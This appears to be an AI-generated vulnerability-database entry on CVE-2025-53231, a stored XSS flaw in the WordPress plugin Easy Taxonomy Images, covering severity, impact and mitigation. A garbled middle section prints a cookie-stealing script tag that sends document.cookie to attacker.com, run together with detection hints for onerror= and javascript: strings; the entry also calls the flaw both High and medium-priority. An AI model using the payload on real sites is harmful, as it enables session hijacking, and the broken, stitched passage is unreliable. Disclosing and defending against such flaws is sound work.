
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-53231 is a Stored Cross-Site Scripting (XSS) vulnerability in the WordPress plugin Easy Taxonomy Images by wpdevstudio, affecting all versions up to and including 1.0.1. The vulnerability stems from improper neutralization of user-supplied input during web page generation (CWE-79). It was reported by security researcher Nguyen Xuan Chien on May 19, 2025, and publicly disclosed by Patchstack on June 18, 2025. It carries a CVSS v3.1 base score of 7.1 (High) (Patchstack).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting) and is exploitable over the network with low attack complexity. It is a Stored XSS variant, meaning malicious scripts are persisted server-side and executed in victims' browsers upon page load. Exploitation requires no authentication (unauthenticated attacker can inject the payload) but does require user interaction from a privileged user to trigger execution, with a changed scope indicating the impact crosses the security boundary of the vulnerable component (Patchstack).
Successful exploitation allows an attacker to inject and persistently store malicious JavaScript within the WordPress site, which executes in the browsers of visiting users or administrators. This can lead to session hijacking, credential theft, unauthorized administrative actions, defacement, or redirection of site visitors to malicious content. The changed scope in the CVSS vector indicates that the impact extends beyond the plugin itself to affect the broader WordPress environment and its users (Patchstack).
As of the disclosure date, no official patch is available for the Easy Taxonomy Images plugin. Patchstack has issued a virtual patching/mitigation rule to block exploitation attempts for users of their platform. The EPSS score is approximately 0.029% (0.000290), indicating a low but non-negligible probability of exploitation in the near term. Patchstack notes that vulnerabilities of this type are commonly used in mass-exploit campaigns targeting WordPress sites at scale, regardless of site popularity. No in-the-wild exploitation or threat actor attribution has been publicly reported at this time (Patchstack).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) designed to exfiltrate session cookies or perform actions on behalf of the victim.%3Cscript%3E, onerror=, onload=).<script> tags, JavaScript URIs (javascript:), or HTML event attributes in taxonomy image metadata fields within the WordPress wp_terms, wp_termmeta, or related tables.wp-content/plugins/easy-taxonomy-images/ that may indicate follow-on compromise after XSS-based admin session hijacking.As of the disclosure date (June 18, 2025), no official patch has been released by the plugin developer for Easy Taxonomy Images. The recommended immediate action is to deactivate and remove the plugin until a patched version becomes available. Patchstack users benefit from a virtual patching rule that blocks exploitation attempts automatically. Site administrators should also review stored taxonomy data for signs of injected scripts and consider implementing a Web Application Firewall (WAF) with XSS filtering rules as an interim measure (Patchstack).
Patchstack, which coordinated the disclosure, classified this as a medium-priority vulnerability and noted that stored XSS flaws of this type are frequently leveraged in mass WordPress exploitation campaigns. The vulnerability was credited to researcher Nguyen Xuan Chien. No significant broader media coverage or notable social media discussion has been identified beyond the Patchstack advisory (Patchstack).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."